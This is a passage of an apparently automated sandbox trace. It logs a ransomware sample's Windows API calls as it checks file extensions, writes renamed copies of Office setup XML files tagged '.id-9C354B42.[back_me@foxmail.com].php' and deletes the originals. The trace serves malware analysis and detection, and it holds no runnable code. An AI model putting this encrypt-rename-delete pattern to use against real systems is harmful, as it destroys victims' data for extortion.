returned 110 [0041.418] lstrlenW (lpString=".doc") returned 4 [0041.418] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.418] lstrlenW (lpString=".docx") returned 5 [0041.418] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.418] lstrlenW (lpString=".pdf") returned 4 [0041.418] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.418] lstrlenW (lpString=".xls") returned 4 [0041.418] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.418] lstrlenW (lpString=".xlsx") returned 5 [0041.418] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.418] lstrlenW (lpString=".ppt") returned 4 [0041.418] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0041.418] lstrlenW (lpString=".zip") returned 4 [0041.418] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.418] lstrlenW (lpString=".rar") returned 4 [0041.418] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.418] lstrlenW (lpString=".bz2") returned 4 [0041.418] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.418] lstrlenW (lpString=".7z") returned 3 [0041.418] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0041.418] lstrlenW (lpString=".dbf") returned 4 [0041.418] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0041.418] lstrlenW (lpString=".1cd") returned 4 [0041.418] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.419] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 110 [0041.419] lstrlenW (lpString=".jpg") returned 4 [0041.419] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.419] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.419] lstrlenW (lpString="SETUP.XML") returned 9 [0041.419] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.419] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=2362) returned 1 [0041.419] CloseHandle (hObject=0x1b0) returned 1 [0041.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 0x20 [0041.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.419] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.419] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.420] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.420] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0041.420] GetLastError () returned 0x0 [0041.420] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x93a, lpOverlapped=0x0) returned 1 [0041.421] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x940, lpOverlapped=0x0) returned 1 [0041.422] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.422] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.422] SetEndOfFile (hFile=0x1a8) returned 1 [0041.422] CloseHandle (hObject=0x1a8) returned 1 [0041.423] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.423] SetEndOfFile (hFile=0x1b0) returned 1 [0041.424] CloseHandle (hObject=0x1b0) returned 1 [0041.424] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.424] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 1 [0041.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0041.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0041.424] lstrlenW (lpString=".doc") returned 4 [0041.424] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.424] lstrlenW (lpString=".docx") returned 5 [0041.424] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.424] lstrlenW (lpString=".pdf") returned 4 [0041.424] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.424] lstrlenW (lpString=".xls") returned 4 [0041.424] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.424] lstrlenW (lpString=".xlsx") returned 5 [0041.424] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.425] lstrlenW (lpString=".ppt") returned 4 [0041.425] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0041.425] lstrlenW (lpString=".zip") returned 4 [0041.425] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.425] lstrlenW (lpString=".rar") returned 4 [0041.425] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.425] lstrlenW (lpString=".bz2") returned 4 [0041.425] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.425] lstrlenW (lpString=".7z") returned 3 [0041.425] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0041.425] lstrlenW (lpString=".dbf") returned 4 [0041.425] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0041.425] lstrlenW (lpString=".1cd") returned 4 [0041.425] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0041.425] lstrlenW (lpString=".jpg") returned 4 [0041.425] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0041.425] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0041.425] lstrlenW (lpString=".doc") returned 4 [0041.425] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.425] lstrlenW (lpString=".docx") returned 5 [0041.425] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.425] lstrlenW (lpString=".pdf") returned 4 [0041.425] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.425] lstrlenW (lpString=".xls") returned 4 [0041.425] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.425] lstrlenW (lpString=".xlsx") returned 5 [0041.425] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.426] lstrlenW (lpString=".ppt") returned 4 [0041.426] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0041.426] lstrlenW (lpString=".zip") returned 4 [0041.426] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.426] lstrlenW (lpString=".rar") returned 4 [0041.426] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.426] lstrlenW (lpString=".bz2") returned 4 [0041.426] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.426] lstrlenW (lpString=".7z") returned 3 [0041.426] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0041.426] lstrlenW (lpString=".dbf") returned 4 [0041.426] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0041.426] lstrlenW (lpString=".1cd") returned 4 [0041.426] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.426] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 104 [0041.426] lstrlenW (lpString=".jpg") returned 4 [0041.426] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.426] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.426] lstrlenW (lpString="Office32WW.XML") returned 14 [0041.426] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.427] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=4274) returned 1 [0041.427] CloseHandle (hObject=0x1b0) returned 1 [0041.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 0x20 [0041.427] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.427] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.427] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.427] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.427] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0041.427] GetLastError () returned 0x0 [0041.427] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0041.429] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0041.430] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.430] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0041.430] SetEndOfFile (hFile=0x1a8) returned 1 [0041.430] CloseHandle (hObject=0x1a8) returned 1 [0041.431] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.431] SetEndOfFile (hFile=0x1b0) returned 1 [0041.432] CloseHandle (hObject=0x1b0) returned 1 [0041.432] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.432] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 1 [0041.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0041.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0041.432] lstrlenW (lpString=".doc") returned 4 [0041.432] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.432] lstrlenW (lpString=".docx") returned 5 [0041.432] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0041.432] lstrlenW (lpString=".pdf") returned 4 [0041.432] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.432] lstrlenW (lpString=".xls") returned 4 [0041.432] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.432] lstrlenW (lpString=".xlsx") returned 5 [0041.432] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0041.432] lstrlenW (lpString=".ppt") returned 4 [0041.432] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0041.432] lstrlenW (lpString=".zip") returned 4 [0041.432] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.433] lstrlenW (lpString=".rar") returned 4 [0041.433] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.433] lstrlenW (lpString=".bz2") returned 4 [0041.433] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.433] lstrlenW (lpString=".7z") returned 3 [0041.433] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0041.433] lstrlenW (lpString=".dbf") returned 4 [0041.433] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0041.433] lstrlenW (lpString=".1cd") returned 4 [0041.433] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0041.433] lstrlenW (lpString=".jpg") returned 4 [0041.433] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0041.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0041.433] lstrlenW (lpString=".doc") returned 4 [0041.433] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.433] lstrlenW (lpString=".docx") returned 5 [0041.433] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0041.433] lstrlenW (lpString=".pdf") returned 4 [0041.433] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.433] lstrlenW (lpString=".xls") returned 4 [0041.433] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.433] lstrlenW (lpString=".xlsx") returned 5 [0041.433] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0041.433] lstrlenW (lpString=".ppt") returned 4 [0041.433] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0041.433] lstrlenW (lpString=".zip") returned 4 [0041.433] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.433] lstrlenW (lpString=".rar") returned 4 [0041.433] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.434] lstrlenW (lpString=".bz2") returned 4 [0041.434] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.434] lstrlenW (lpString=".7z") returned 3 [0041.434] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0041.434] lstrlenW (lpString=".dbf") returned 4 [0041.434] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0041.434] lstrlenW (lpString=".1cd") returned 4 [0041.434] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.434] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106 [0041.434] lstrlenW (lpString=".jpg") returned 4 [0041.434] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.434] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0041.434] lstrlenW (lpString="OneNoteMUI.XML") returned 14 [0041.434] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.438] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1606) returned 1 [0041.438] CloseHandle (hObject=0x1b0) returned 1 [0041.439] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 0x20 [0041.439] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0041.439] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0041.439] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.439] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.439] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0041.441] GetLastError () returned 0x0 [0041.441] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x646, lpOverlapped=0x0) returned 1 [0041.754] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x650, lpOverlapped=0x0) returned 1 [0041.755] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.755] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0041.755] SetEndOfFile (hFile=0x1a8) returned 1 [0041.756] CloseHandle (hObject=0x1a8) returned 1 [0041.756] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.756] SetEndOfFile (hFile=0x1b0) returned 1 [0041.757] CloseHandle (hObject=0x1b0) returned 1 [0041.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0041.758] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml")) returned 1 [0041.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0041.758] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0041.758] lstrlenW (lpString=".doc") returned 4 [0041.758] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.758] lstrlenW (lpString=".docx") returned 5 [0041.758] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0041.758] lstrlenW (lpString=".pdf") returned 4 [0041.758] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.758] lstrlenW (lpString=".xls") returned 4 [0041.758] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.758] lstrlenW (lpString=".xlsx") returned 5 [0041.758] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0041.758] lstrlenW (lpString=".ppt") returned 4 [0041.759] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.759] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML") returned 108 [0041.759] lstrlenW (lpString=".zip") returned 4 [0041.759] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.759] lstrlenW (lpString=".rar") returned 4 [0041.759] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.759] lstrlenW (lpString=".bz2") returned 4 [0041.759] lstrcmpiW (lpString1=".bz2", 